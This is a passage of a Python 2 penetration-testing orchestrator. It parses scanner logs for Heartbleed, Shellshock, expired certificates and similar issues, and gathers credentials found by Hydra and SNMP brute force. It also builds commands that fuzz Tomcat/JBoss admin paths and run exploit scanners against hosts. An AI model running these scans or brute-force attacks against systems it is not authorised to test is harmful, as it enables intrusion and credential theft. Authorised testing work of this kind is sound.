346 | print x 347 | secureAndInsecureList=[] 348 | secureList=[] 349 | insecureList=[] 350 | 351 | for x in renegotiationSecureList: 352 | if x in renegotiationInsecureList: 353 | if x not in secureAndInsecureList: 354 | secureAndInsecureList.append(x) 355 | else: 356 | if x not in secureList: 357 | secureList.append(x) 358 | for x in renegotiationInsecureList: 359 | if x in renegotiationSecureList: 360 | if x not in secureAndInsecureList: 361 | secureAndInsecureList.append(x) 362 | else: 363 | if x not in insecureList: 364 | insecureList.append(x) 365 | 366 | if len(secureAndInsecureList)>0: 367 | print "\n****** Secure and Insecure SSL Renegotatiation ****** " 368 | for x in secureAndInsecureList: 369 | print x 370 | if len(secureList)>0: 371 | print "\n****** Secure SSL Renegotatiation ****** " 372 | for x in secureList: 373 | print x 374 | if len(insecureList)>0: 375 | print "\n****** Insecure SSL Renegotatiation ****** " 376 | for x in insecureList: 377 | print x 378 | 379 | if len(sslv3List)>0: 380 | print "\n****** SSLv3 Supported ****** " 381 | for x in sslv3List: 382 | print x 383 | if len(sslv2List)>0: 384 | print "\n****** SSLv2 Supported ****** " 385 | for x in sslv2List: 386 | print x 387 | 388 | filename = "runSSLTlssled*.log" 389 | failedList=[] 390 | vulnList=[] 391 | for file in glob.glob(filename): 392 | lines=[] 393 | with open(file) as f: 394 | lines = f.read().splitlines() 395 | if "[*] Running sslscan on " not in str(lines): 396 | failedList.append(file) 397 | os.remove(origPath+"/"+file) 398 | 399 | if len(failedList)>0: 400 | print "\n****** Tlssled Failure ****** " 401 | for x in failedList: 402 | print x 403 | y = x.split(":") 404 | print "Please rerun 'python2.7 runMulti.py -tasks tlssled' to retest failed hosts" 405 | 406 | currentYear = (time.strftime("%Y")) 407 | currentMth = (time.strftime("%m")) 408 | currentDay = (time.strftime("%d")) 409 | 410 | currentDate = datetime.datetime(int(currentYear),int(currentMth),int(currentDay)) 411 | 
412 | filename = "runXmpp_*.log" 413 | failedList=[] 414 | vulnList=[] 415 | for file in glob.glob(filename): 416 | tempTitle = file.replace("runXmpp_","") 417 | tempTitle = tempTitle.replace(".log","") 418 | tempTitle = tempTitle.replace("_",":") 419 | hostNo = tempTitle.split(":")[0] 420 | portNo = tempTitle.split(":")[1] 421 | lines=[] 422 | with open(file) as f: 423 | lines = f.read().splitlines() 424 | for x in lines: 425 | if "Valid credentials" in x: 426 | if x not in vulnList: 427 | vulnList.append(hostNo+":"+portNo,x) 428 | 429 | if len(vulnList)>0: 430 | print "\n****** Found the below credentials on XMPP server****** " 431 | for x in vulnList: 432 | print x 433 | 434 | filename = "runSSLCert_*.log" 435 | failedList=[] 436 | vulnList=[] 437 | for file in glob.glob(filename): 438 | lines=[] 439 | with open(file) as f: 440 | lines = f.read().splitlines() 441 | tempTitle = file.replace("runSSLCert_","") 442 | tempTitle = tempTitle.replace(".log","") 443 | tempTitle = tempTitle.replace("_",":") 444 | hostNo = tempTitle.split(":")[0] 445 | portNo = tempTitle.split(":")[1] 446 | for x in lines: 447 | if "Not valid after" in x: 448 | x = x.replace("Not valid after:","") 449 | x = x.replace("|","") 450 | y = x.split("T")[0] 451 | y = y.strip() 452 | try: 453 | certDateYear = int(y.split("-")[0]) 454 | certDateMth = int(y.split("-")[1]) 455 | certDateDay = int(str(y.split("-")[2]).split(" ")[0]) 456 | certDate = datetime.datetime(certDateYear,certDateMth,certDateDay) 457 | if currentDate>certDate: 458 | vulnList.append(tempTitle+"\t"+y) 459 | except ValueError: 460 | continue 461 | if len(vulnList)>0: 462 | print "\n****** Expired SSL Certificates ****** " 463 | for x in vulnList: 464 | print x 465 | 466 | vulnList=[] 467 | fileList=[] 468 | fileList.append("portFTP.txt") 469 | fileList.append("portTelnet.txt") 470 | for file in fileList: 471 | if os.path.exists(origPath+"/"+file): 472 | f = open(file,"r") 473 | lines = f.read().splitlines() 474 | for line in 
lines: 475 | vulnList.append(line) 476 | if len(vulnList)>0: 477 | print "\n****** Plaintext Protocols ****** " 478 | for x in vulnList: 479 | print x 480 | 481 | if len(failedList)>0: 482 | print "\n****** Hydra SSH Bruteforce Failure ****** " 483 | for x in failedList: 484 | print x 485 | y = x.split(":") 486 | print "Please rerun 'python2.7 runMulti.py -tasks ssh' to retest failed hosts" 487 | 488 | filename = "runHydraSSH_*.log" 489 | failedList=[] 490 | vulnList=[] 491 | for file in glob.glob(filename): 492 | lines=[] 493 | with open(file) as f: 494 | lines = f.read().splitlines() 495 | if "finished at " not in str(lines): 496 | failedList.append(file) 497 | os.remove(origPath+"/"+file) 498 | 499 | if len(failedList)>0: 500 | print "\n****** Hydra SSH Bruteforce Failure ****** " 501 | for x in failedList: 502 | print x 503 | y = x.split(":") 504 | print "Please rerun 'python2.7 runMulti.py -tasks ssh' to retest failed hosts" 505 | 506 | 507 | filename = "runHydraTelnet_*.log" 508 | failedList=[] 509 | vulnList=[] 510 | for file in glob.glob(filename): 511 | lines=[] 512 | with open(file) as f: 513 | lines = f.read().splitlines() 514 | if "finished at " not in str(lines): 515 | failedList.append(file) 516 | os.remove(origPath+"/"+file) 517 | 518 | if len(failedList)>0: 519 | print "\n****** Hydra Telnet Bruteforce Failure ****** " 520 | for x in failedList: 521 | print x 522 | y = x.split(":") 523 | print "Please rerun 'python2.7 runMulti.py -tasks telnet' to retest failed hosts" 524 | 525 | 526 | filename = "runHydraFTP_*.log" 527 | failedList=[] 528 | vulnList=[] 529 | for file in glob.glob(filename): 530 | lines=[] 531 | with open(file) as f: 532 | lines = f.read().splitlines() 533 | if "0 of 1 target completed" in str(lines): 534 | failedList.append(file) 535 | os.remove(origPath+"/"+file) 536 | 537 | if len(failedList)>0: 538 | print "\n****** Hydra FTP Bruteforce Failure ****** " 539 | for x in failedList: 540 | print x 541 | y = x.split(":") 542 | print 
"Please rerun 'python2.7 runMulti.py -tasks ftp' to retest failed hosts" 543 | 544 | 545 | filename = "runSSLHeartbleed_*.log" 546 | failedList=[] 547 | vulnList=[] 548 | notVulnList=[] 549 | for file in glob.glob(filename): 550 | lines=[] 551 | tempTitle = file.replace("runSSLHeartbleed_","") 552 | tempTitle = tempTitle.replace(".log","") 553 | tempTitle = tempTitle.replace("_",":") 554 | with open(file) as f: 555 | lines = f.read().splitlines() 556 | if "likely not vulnerable" in str(lines): 557 | if tempTitle not in notVulnList: 558 | notVulnList.append(tempTitle) 559 | else: 560 | if "vulnerable" in str(lines): 561 | if tempTitle not in notVulnList: 562 | if tempTitle not in vulnList: 563 | vulnList.append(tempTitle) 564 | else: 565 | if tempTitle not in failedList: 566 | failedList.append(tempTitle) 567 | if len(vulnList)>0: 568 | print "\n****** Vulnerable to Heartbleed ****** " 569 | for x in vulnList: 570 | print x 571 | #if len(failedList)>0: 572 | # print "\n****** Heartbleed Test issues ****** " 573 | # for x in failedList: 574 | # print x 575 | # hostNo = x.split(":") 576 | 577 | filename = "runSSLCCS_*.log" 578 | failedList=[] 579 | vulnList=[] 580 | for file in glob.glob(filename): 581 | lines=[] 582 | tempTitle = file.replace("runSSLCCS_","") 583 | tempTitle = tempTitle.replace(".log","") 584 | tempTitle = tempTitle.replace("_",":") 585 | with open(file) as f: 586 | lines = f.read().splitlines() 587 | for line in lines: 588 | line = line.strip() 589 | if "may allow" in line: 590 | if tempTitle not in vulnList: 591 | vulnList.append(tempTitle) 592 | if "Failure connecting to" in line: 593 | if tempTitle not in failedList: 594 | failedList.append(tempTitle) 595 | if len(failedList)>0: 596 | print "\n****** OpenSSL ChangeCipherSpec Scan Failure ****** " 597 | for x in failedList: 598 | print x 599 | y = x.split(":") 600 | filename = origPath+"/runSSLCCS_"+y[0]+"_"+y[1]+".log" 601 | os.remove(filename) 602 | print "Please rerun 'python2.7 runMulti.py 
-tasks sslccs' to retest failed hosts" 603 | if len(vulnList)>0: 604 | print "\n****** Vulnerable to OpenSSL ChangeCipherSpec Man-in-the-middle Flaw ******" 605 | for x in vulnList: 606 | print x 607 | 608 | filename = "runShellshock_*.log" 609 | failedList=[] 610 | vulnList=[] 611 | for file in glob.glob(filename): 612 | lines=[] 613 | tempTitle = file.replace("runShellshock_","") 614 | tempTitle = tempTitle.replace(".log","") 615 | tempTitle = tempTitle.replace("_",":") 616 | with open(file) as f: 617 | lines = f.read().splitlines() 618 | for line in lines: 619 | line = line.strip() 620 | if "looks vulnerable" in line: 621 | print line 622 | if tempTitle not in vulnList: 623 | vulnList.append(tempTitle) 624 | if "Failure connecting to" in line: 625 | if tempTitle not in failedList: 626 | failedList.append(tempTitle) 627 | if len(failedList)>0: 628 | print "\n****** Shellshock Test Failure ****** " 629 | for x in failedList: 630 | print x 631 | y = x.split(":") 632 | filename = origPath+"/runShellshock_"+y[0]+"_"+y[1]+".log" 633 | os.remove(filename) 634 | print "Please rerun 'python2.7 runMulti.py -tasks shellshock' to retest failed hosts" 635 | if len(vulnList)>0: 636 | print "\n****** Vulnerable to Shellshock ******" 637 | for x in vulnList: 638 | print x 639 | 640 | #SSL Known Key 641 | filename = "runSSLKnownKey_*.log" 642 | failedList=[] 643 | vulnList=[] 644 | for file in glob.glob(filename): 645 | lines=[] 646 | tempTitle = file.replace("runSSLKnownKey_","") 647 | tempTitle = tempTitle.replace(".log","") 648 | tempTitle = tempTitle.replace("_",":") 649 | with open(file) as f: 650 | lines = f.read().splitlines() 651 | for line in lines: 652 | line = line.strip() 653 | if "Found in " in line: 654 | if tempTitle not in vulnList: 655 | vulnList.append(tempTitle) 656 | if len(vulnList)>0: 657 | print "\n****** SSL-Known-Key in LittleBlackBox ******" 658 | for x in vulnList: 659 | print x 660 | ''' 661 | #Clusterd 662 | filename = "runClusterd_*.log" 663 | 
failedList=[] 664 | vulnList=[] 665 | for file in glob.glob(filename): 666 | lines=[] 667 | tempTitle = file.replace("runClusterd_","") 668 | tempTitle = tempTitle.replace(".log","") 669 | tempTitle = tempTitle.replace("_",":") 670 | tempTitle = tempTitle.replace("https:","https://") 671 | tempTitle = tempTitle.replace("http:","http://") 672 | with open(file) as f: 673 | lines = f.read().splitlines() 674 | for line in lines: 675 | line = line.strip() 676 | ansi_escape = re.compile(r'\x1b[^m]*m') 677 | line = ansi_escape.sub('', line) 678 | if "] " in line: 679 | line1 = line.split("\t") 680 | if tempTitle not in vulnList: 681 | vulnList.append(tempTitle+"\t"+line1[1]) 682 | if len(vulnList)>0: 683 | print "\n****** Clusterd Results ******" 684 | for x in vulnList: 685 | print x 686 | ''' 687 | 688 | #NTP Monlist 689 | filename = "runNTP.log" 690 | failedList=[] 691 | vulnList=[] 692 | lines=[] 693 | 694 | if os.path.exists(filename): 695 | with open(filename) as f: 696 | lines = f.read().splitlines() 697 | tempTitle="" 698 | for line in lines: 699 | line = line.strip() 700 | if "Nmap scan report for " in line: 701 | tempTitle = line.replace("Nmap scan report for ","") 702 | if "ntp-monlist:" in line: 703 | if tempTitle not in vulnList: 704 | vulnList.append(tempTitle) 705 | if len(vulnList)>0: 706 | print "\n****** NTP Monlist ******" 707 | for x in vulnList: 708 | print x 709 | 710 | #Tilde 711 | filename = "runTilde_*.log" 712 | failedList=[] 713 | vulnList=[] 714 | for file in glob.glob(filename): 715 | lines=[] 716 | tempTitle = file.replace("runTilde_","") 717 | tempTitle = tempTitle.replace(".log","") 718 | tempTitle = tempTitle.replace("_",":") 719 | with open(file) as f: 720 | lines = f.read().splitlines() 721 | found1=False 722 | tempList=[] 723 | tempTitle1="" 724 | for line in lines: 725 | line = line.strip() 726 | if "--------- Final Result ---------" in line.strip(): 727 | found1=True 728 | if tempTitle not in tempList: 729 | tempTitle1 = "\nThe below 
files and folders are enumerated on host: "+tempTitle 730 | #tempList.append("\n********** "+tempTitle+" **********") 731 | if "File(s) was/were found" in line.strip(): 732 | if "0 Dir(s) was/were found" in tempList and "0 File(s) was/were found" in tempList: 733 | continue 734 | else: 735 | if len(tempList)>1: 736 | vulnList.append(tempTitle1) 737 | for x in tempList: 738 | vulnList.append(x) 739 | tempList=[] 740 | found1=False 741 | if found1==True: 742 | if "Dir(s) was/were found" not in line and "--------- Final Result ---------" not in line and "requests have been sent to the server" not in line: 743 | tempList.append(line) 744 | 745 | if len(vulnList)>0: 746 | print "\n****** Hosts Vulnerable to Tilde Enumeration ******" 747 | for x in vulnList: 748 | print x 749 | #VPN 750 | filename = "runPort500_ikescan_*.log" 751 | failedList=[] 752 | vulnList=[] 753 | for file in glob.glob(filename): 754 | lines=[] 755 | tempTitle = file.replace("runPort500_ikescan_","") 756 | tempTitle = tempTitle.replace(".log","") 757 | tempTitle = tempTitle.replace("_",":") 758 | with open(file) as f: 759 | lines = f.read().splitlines() 760 | for line in lines: 761 | line = line.strip() 762 | if "DES" in line: 763 | if tempTitle not in vulnList: 764 | vulnList.append(tempTitle) 765 | if len(vulnList)>0: 766 | print "\n****** VPN Peer Supports Weak Encryption ******" 767 | for x in vulnList: 768 | print x 769 | 770 | vulnList=[] 771 | filename = "runShellshock_https_*.log" 772 | for file in glob.glob(filename): 773 | lines=[] 774 | tempTitle = file.replace("runShellshock_https_","") 775 | tempTitle = tempTitle.replace(".log","") 776 | tempTitle = tempTitle.replace("_",":") 777 | with open(file) as f: 778 | lines = f.read().splitlines() 779 | for line in lines: 780 | line = line.strip() 781 | if "looks vulnerable " in line: 782 | line = line.replace("Service Info: ","") 783 | if tempTitle not in vulnList: 784 | vulnList.append(tempTitle+"\t"+line) 785 | if len(vulnList)>0: 786 | print 
"\n****** Shellshock ******" 787 | for x in vulnList: 788 | print x 789 | 790 | #VPN Device Fingerprinting 791 | filename = "runPort500_ikeversion_*.log" 792 | failedList=[] 793 | vulnList=[] 794 | for file in glob.glob(filename): 795 | lines=[] 796 | tempTitle = file.replace("runPort500_ikeversion_","") 797 | tempTitle = tempTitle.replace(".log","") 798 | tempTitle = tempTitle.replace("_",":") 799 | with open(file) as f: 800 | lines = f.read().splitlines() 801 | for line in lines: 802 | line = line.strip() 803 | if "Service Info: " in line: 804 | line = line.replace("Service Info: ","") 805 | if tempTitle not in vulnList: 806 | vulnList.append(tempTitle+"\t"+line) 807 | if len(vulnList)>0: 808 | print "\n****** VPN Device Fingerprinting ******" 809 | for x in vulnList: 810 | print x 811 | 812 | #SNMP Bruteforce 813 | filename = "runSNMP_*.log" 814 | failedList=[] 815 | vulnList=[] 816 | for file in glob.glob(filename): 817 | lines=[] 818 | tempTitle = file.replace("runSNMP_","") 819 | tempTitle = tempTitle.replace(".log","") 820 | tempTitle = tempTitle.replace("_",":") 821 | with open(file) as f: 822 | lines = f.read().splitlines() 823 | for line in lines: 824 | line = line.strip() 825 | if "valid credentials" in line.lower(): 826 | line = line.replace("- Valid credentials","") 827 | line = line.replace("|_","") 828 | line = line.strip() 829 | if tempTitle not in vulnList: 830 | vulnList.append(tempTitle+"\t"+line) 831 | if len(vulnList)>0: 832 | print "\n****** SNMP Bruteforce ******" 833 | for x in vulnList: 834 | print x 835 | 836 | #Hydra SSH 837 | filename = "runHydraSSH_*.log" 838 | failedList=[] 839 | vulnList=[] 840 | for file in glob.glob(filename): 841 | lines=[] 842 | tempTitle = file.replace("runHydraSSH_","") 843 | tempTitle = tempTitle.replace(".log","") 844 | tempTitle = tempTitle.replace("_",":") 845 | with open(file) as f: 846 | lines = f.read().splitlines() 847 | for line in lines: 848 | line = line.strip() 849 | if "[ssh] host: " in line: 850 | 
if tempTitle not in vulnList: 851 | vulnList.append(line) 852 | if len(vulnList)>0: 853 | print "\n****** Hydra SSH Results ******" 854 | for x in vulnList: 855 | print x 856 | 857 | #DNS Zone Transfer 858 | filename = "runPort53_zonetransfer_*.log" 859 | failedList=[] 860 | vulnList=[] 861 | for file in glob.glob(filename): 862 | lines=[] 863 | tempTitle = file.replace("runPort53_zonetransfer_","") 864 | tempTitle = tempTitle.replace(".log","") 865 | tempTitle = tempTitle.replace("_",":") 866 | with open(file) as f: 867 | lines = f.read().splitlines() 868 | for line in lines: 869 | line = line.strip() 870 | if "dns-zone-transfer:" in line: 871 | if tempTitle not in vulnList: 872 | vulnList.append(tempTitle) 873 | if len(vulnList)>0: 874 | print "\n****** DNS Zone Transfer ******" 875 | for x in vulnList: 876 | print x 877 | 878 | def execute1(jobs, num_processes=2): 879 | work_queue = multiprocessing.Queue() 880 | for job in jobs: 881 | work_queue.put(job) 882 | 883 | result_queue = multiprocessing.Queue() 884 | worker = [] 885 | for i in range(int(num_processes)): 886 | worker.append(Worker1(work_queue, result_queue)) 887 | worker[i].start() 888 | 889 | results = [] 890 | while len(results) < len(jobs): 891 | result = result_queue.get() 892 | results.append(result) 893 | results.sort() 894 | return (results) 895 | os.chdir(origPath) 896 | 897 | tomcatFoundList=[] 898 | 899 | sslList=[] 900 | resultListwhatweb=[] 901 | resultListASAXSS=[] 902 | resultListshellshock=[] 903 | resultListclusterd=[] 904 | resultListsslcert=[] 905 | resultListsslknownkey=[] 906 | resultListsslccs=[] 907 | resultListheartbleed=[] 908 | resultListtlssled=[] 909 | resultListtelnet=[] 910 | resultListssh=[] 911 | resultListssl=[] 912 | resultList161=[] 913 | resultList3306=[] 914 | resultList6379=[] 915 | resultList1099=[] 916 | resultList5432=[] 917 | resultList2010=[] 918 | resultList27017=[] 919 | resultList512=[] 920 | resultList5900=[] 921 | resultList5222=[] 922 | resultList500=[] 
923 | resultList5900=[] 924 | resultList25=[] 925 | resultList139=[] 926 | resultList512=[] 927 | resultList513=[] 928 | resultList554=[] 929 | resultList902=[] 930 | resultList2002=[] 931 | resultList2401=[] 932 | resultList8098=[] 933 | resultList9160=[] 934 | resultList873=[] 935 | resultList1080=[] 936 | resultList1723=[] 937 | resultList3389=[] 938 | resultList5432=[] 939 | resultList5666=[] 940 | resultList5850=[] 941 | resultList9390=[] 942 | resultList9391=[] 943 | resultList9929=[] 944 | resultList49152=[] 945 | resultList445=[] 946 | resultList137=[] 947 | resultList53=[] 948 | 949 | def chunk(input, size): 950 | return map(None, *([iter(input)] * size)) 951 | 952 | def testURLs(url): 953 | filename = origPath+"/uriList.txt" 954 | if not os.path.exists(filename): 955 | urllib.urlretrieve ("https://raw.githubusercontent.com/milo2012/metasploitHelper/master/uriList.txt","uriList.txt") 956 | wordList=[] 957 | wordList.append("/jmx-console") 958 | wordList.append("/web-console") 959 | wordList.append("/web-console/Invoker") 960 | wordList.append("/invoker/JMXInvokerServlet") 961 | wordList.append("/WEB-INF/jboss-web.xml") 962 | wordList.append("/examples") 963 | wordList.append("/examples/jsp/index.html") 964 | wordList.append("/examples/jsp/snp/snoop.jsp") 965 | wordList.append("/examples/jsp/source.jsp") 966 | wordList.append("/examples/servlet/HelloWorldExample") 967 | wordList.append("/examples/servlet/SnoopServlet") 968 | wordList.append("/examples/servlet/TroubleShooter") 969 | wordList.append("/examples/servlet/default/jsp/snp/snoop.jsp") 970 | wordList.append("/examples/servlet/default/jsp/source.jsp") 971 | wordList.append("/examples/servlet/org.apache.catalina.INVOKER.HelloWorldExample") 972 | wordList.append("/examples/servlet/org.apache.catalina.INVOKER.SnoopServlet") 973 | wordList.append("/examples/servlet/org.apache.catalina.INVOKER.TroubleShooter") 974 | 
wordList.append("/examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/snp/snoop.jsp") 975 | wordList.append("/examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/source.jsp") 976 | wordList.append("/examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/snp/snoop.jsp") 977 | wordList.append("/examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/source.jsp") 978 | wordList.append("/examples/servlet/snoop") 979 | wordList.append("/examples/servlets/index.html") 980 | wordList.append("/jsp-examples") 981 | wordList.append("/manager") 982 | wordList.append("/manager/deploy?path=foo") 983 | wordList.append("/manager/html/") 984 | wordList.append("/servlet/default/") 985 | wordList.append("/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.DefaultServlet/tomcat.gif") 986 | wordList.append("/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.SnoopAllServlet") 987 | wordList.append("/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.WebdavServlet/") 988 | wordList.append("/servlet/org.apache.catalina.servlets.DefaultServlet/") 989 | wordList.append("/servlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif") 990 | wordList.append("/servlet/org.apache.catalina.servlets.HTMLManagerServlet") 991 | wordList.append("/servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif") 992 | wordList.append("/servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.SnoopAllServlet") 993 | wordList.append("/servlet/org.apache.catalina.servlets.ManagerServlet") 994 | wordList.append("/servlet/org.apache.catalina.servlets.SnoopAllServlet") 995 | wordList.append("/servlet/org.apache.catalina.servlets.WebdavServlet/") 996 | wordList.append("/tomcat-docs") 997 | wordList.append("/webdav") 998 | wordList.append("/webdav/index.html") 999 | wordList.append("/webdav/servlet/org.apache.catalina.servlets.WebdavServlet/") 1000 | 
wordList.append("/webdav/servlet/webdav/") 1001 | wordList.append("/conf/") 1002 | wordList.append("/conf/server.xml/") 1003 | wordList.append("/WEB-INF/") 1004 | wordList.append("/WEB-INF/web.xml") 1005 | wordList.append("/WEB-INF/classes/") 1006 | wordList.append("/shared/") 1007 | wordList.append("/shared/lib/") 1008 | 1009 | f = open(filename,"r") 1010 | lines = f.read().splitlines() 1011 | for line in lines: 1012 | wordList.append(line) 1013 | f.close() 1014 | 1015 | filename = open(origPath+"/tempFuzz.txt","w") 1016 | for uriPath in wordList: 1017 | filename.write(uriPath+"\n") 1018 | filename.close() 1019 | 1020 | if "https" in url: 1021 | url1 = url.replace("https://","") 1022 | hostList = url1.split(":") 1023 | hostNo = hostList[0].strip() 1024 | portNo = hostList[1].strip() 1025 | logFilename = origPath+"/runPatator_https_"+hostNo+"_"+portNo 1026 | else: 1027 | url1 = url.replace("http://","") 1028 | hostList = url1.split(":") 1029 | hostNo = hostList[0].strip() 1030 | portNo = hostList[1].strip() 1031 | logFilename = origPath+"/runPatator_http_"+hostNo+"_"+portNo 1032 | 1033 | count=0 1034 | resultList=[] 1035 | fullCmd = "cd "+patatorPath+" && python patator.py http_fuzz --threads="+str(numProcesses)+" method=HEAD url="+url+"FILE0 0="+origPath+"/tempFuzz.txt -l "+logFilename 1036 | if not os.path.exists(logFilename): 1037 | print "- Fuzzing file paths on "+url 1038 | #print fullCmd 1039 | results = RunCommand(fullCmd) 1040 | resultsList = results.split("\n") 1041 | count=0 1042 | for x in resultsList: 1043 | if ("200" in x or "401" in x): 1044 | uriPath = (x.split("|")[1]).strip() 1045 | statusCode = (x.split("|")[3]).strip() 1046 | if ("200" in statusCode or "401" in statusCode) and len(uriPath)>0: 1047 | resultList.append(url+uriPath+"\t"+statusCode) 1048 | count+=1 1049 | if uriPath=="/manager/html": 1050 | tomcatFoundList.append(url+uriPath) 1051 | if count<10: 1052 | for x in resultList: 1053 | print x 1054 | 1055 | #newUrl = url+uriPath 1056 | 
#(scheme, netloc, path, params, query, fragment) = urlparse.urlparse(newUrl) 1057 | #if "https" in url: 1058 | # conn = httplib.HTTPSConnection(netloc,timeout=10) 1059 | #else: 1060 | # conn = httplib.HTTPConnection(netloc,timeout=10) 1061 | #conn.request("HEAD", urlparse.urlunparse(('', '', path, params, query, fragment))) 1062 | #res = conn.getresponse() 1063 | #if res.status!=404: 1064 | #print newUrl+"\t"+str(res.status) 1065 | #print res.status, res.reason 1066 | 1067 | 1068 | def runModules(quiet): 1069 | cmdList = [] 1070 | jobs = [] 1071 | jobid = 0 1072 | 1073 | if (taskToRun=="5222" or taskToRun=="bruteURL" or taskToRun=="xmpp" or taskToRun=="yasuo" or taskToRun=="http" or taskToRun=="all" or taskToRun=="whatweb" or taskToRun=="clusterd" or taskToRun=="shellshock" or taskToRun=="asa" or taskToRun=="jboss" or taskToRun=="tomcat" or taskToRun=="dns"): 1074 | filename = origPath+"/portHTTP.txt" 1075 | httpList=[] 1076 | if os.path.exists(filename): 1077 | with open(filename) as f: 1078 | for line in f: 1079 | httpList.append(line) 1080 | for host in httpList: 1081 | host = host.strip() 1082 | host1 = host.replace("https://","") 1083 | host1 = host1.replace("http://","") 1084 | 1085 | hostList = host1.split(":") 1086 | hostNo = hostList[0].strip() 1087 | portNo = hostList[1].strip() 1088 | 1089 | if taskToRun=="bruteURL" or taskToRun=="all": 1090 | testURLs(host) 1091 | 1092 | #if taskToRun=="jboss" or taskToRun=="all": 1093 | # logFilename = origPath+"/runJboss_http_"+hostNo+"_"+portNo 1094 | # if not os.path.exists(logFilename): 1095 | # fullCmd = "cd "+patatorPath+" && python patator.py http_fuzz url=http://"+hostNo+":"+portNo+"FILE0 0="+toolsPath+"/JBoss.fuzz.txt -l "+logFilename 1096 | # if quiet==False: 1097 | # print fullCmd 1098 | # cmdList.append(["jboss",hostNo,fullCmd]) 1099 | 1100 | #if taskToRun=="tomcat" or taskToRun=="all": 1101 | # logFilename = origPath+"/runTomcat_http_"+hostNo+"_"+portNo 1102 | # if not os.path.exists(logFilename): 1103 | # 
fullCmd = "cd "+patatorPath+" && python patator.py http_fuzz url=http://"+hostNo+":"+portNo+"FILE0 0="+toolsPath+"/ApacheTomcat.fuzz.txt -l "+logFilename 1104 | # if quiet==False: 1105 | # print fullCmd 1106 | # cmdList.append(["tomcat",hostNo,fullCmd]) 1107 | 1108 | if taskToRun=="whatweb" or taskToRun=="all" or taskToRun=="http": 1109 | logFilename=origPath+"/runWhatWeb.log" 1110 | if not os.path.exists(logFilename): 1111 | fullCmd="ruby "+toolsPath+"/WhatWeb/whatweb -a 3 "+hostNo+":"+portNo+" 2>&1 >> "+logFilename 1112 | if quiet==False: 1113 | print fullCmd 1114 | cmdList.append(["whatsweb",hostNo,fullCmd]) 1115 | 1116 | if taskToRun=="shellshock" or taskToRun=="all" or taskToRun=="http": 1117 | logFilename = origPath+"/runShellshock_http_"+hostNo+"_"+portNo+".log" 1118 | if not os.path.exists(logFilename): 1119 | fullCmd = "python2.7 "+shellShockPath+"shocker.py --Hostname "+hostNo+" --cgilist "+shellShockPath+"/shocker-cgi_list --port "+portNo+" | tee -a "+logFilename 1120 | #fullCmd = "python2.7 "+shellShockPath+"shellshock_scanner.py "+origPath+"/portHTTP.txt "+shellShockPath+"cgi_list_example.txt -e 2 -w "+origPath+"/resultsHTTPs.csv --proto http -t 10" 1121 | if quiet==False: 1122 | print fullCmd 1123 | cmdList.append(["shellshock",hostNo,fullCmd]) 1124 | 1125 | #if taskToRun=="clusterd" or taskToRun=="all" or taskToRun=="http": 1126 | # logFilename = origPath+"/runClusterd_http_"+hostNo+"_"+portNo+".log" 1127 | # if not os.path.exists(logFilename): 1128 | # fullCmd = "cd "+clusterdPath+" && sudo python "+clusterdPath+"clusterd.py -i "+hostNo+" -p "+portNo+" | tee -a "+logFilename 1129 | # #fullCmd = "cd "+clusterdPath+" && sudo python "+clusterdPath+"clusterd.py -i "+hostNo+" -p "+portNo+" 2>&1 >> "+origPath+"/runClusterd_http_"+hostNo+"_"+portNo+".log" 1130 | # print fullCmd 1131 | # if quiet==False: 1132 | # print fullCmd 1133 | # cmdList.append(["clusterd",hostNo,fullCmd]) 1134 | 1135 | if taskToRun=="yasuo" or taskToRun=="all" or taskToRun=="http": 
1136 | logFilename = origPath+"/runYasuo_http_"+hostNo+"_"+portNo+".log" 1137 | if not os.path.exists(logFilename): 1138 | fullCmd = "cd "+yasuoPath+" && sudo ruby yasuo.rb -r "+hostNo+" -p "+portNo+" -b all | sudo tee -a "+logFilename 1139 | if quiet==False: 1140 | print fullCmd 1141 | cmdList.append(["yasuo",hostNo,fullCmd]) 1142 | 1143 | 1144 | filename = origPath+"/portHTTPs.txt" 1145 | if os.path.exists(filename): 1146 | with open(filename) as f: 1147 | for line in f: 1148 | httpList.append(line) 1149 | for host in httpList: 1150 | if host.count(":")<2: 1151 | if "https" in host: 1152 | host = host+":443" 1153 | if "http" in host: 1154 | host = host+":80" 1155 | host = host.strip() 1156 | host1 = host.replace("https://","") 1157 | host1 = host1.replace("http://","") 1158 | 1159 | hostList = host1.split(":") 1160 | hostNo = hostList[0].strip() 1161 | portNo = hostList[1].strip() 1162 | 1163 | if taskToRun=="bruteURL" or taskToRun=="all": 1164 | testURLs(host) 1165 | 1166 | #if taskToRun=="jboss" or taskToRun=="all": 1167 | # logFilename = origPath+"/runJboss_https_"+hostNo+"_"+portNo 1168 | # if not os.path.exists(logFilename): 1169 | # fullCmd = "cd "+patatorPath+" && python patator.py http_fuzz url=https://"+hostNo+":"+portNo+"FILE0 0="+toolsPath+"/JBoss.fuzz.txt -l "+logFilename 1170 | # if quiet==False: 1171 | # print fullCmd 1172 | # cmdList.append(["jboss",hostNo,fullCmd]) 1173 | 1174 | #if taskToRun=="tomcat" or taskToRun=="all": 1175 | # logFilename = origPath+"/runTomcat_https_"+hostNo+"_"+portNo 1176 | # if not os.path.exists(logFilename): 1177 | # fullCmd = "cd "+patatorPath+" && python patator.py http_fuzz url=http://"+hostNo+":"+portNo+"FILE0 0="+toolsPath+"/ApacheTomcat.fuzz.txt -l "+logFilename 1178 | # if quiet==False: 1179 | # print fullCmd 1180 | # cmdList.append(["tomcat",hostNo,fullCmd]) 1181 | 1182 | if taskToRun=="asa" or taskToRun=="all": 1183 | if portNo=="443": 1184 | logFilename = origPath+"/runASAxss.log" 1185 | lines=[] 1186 | if 
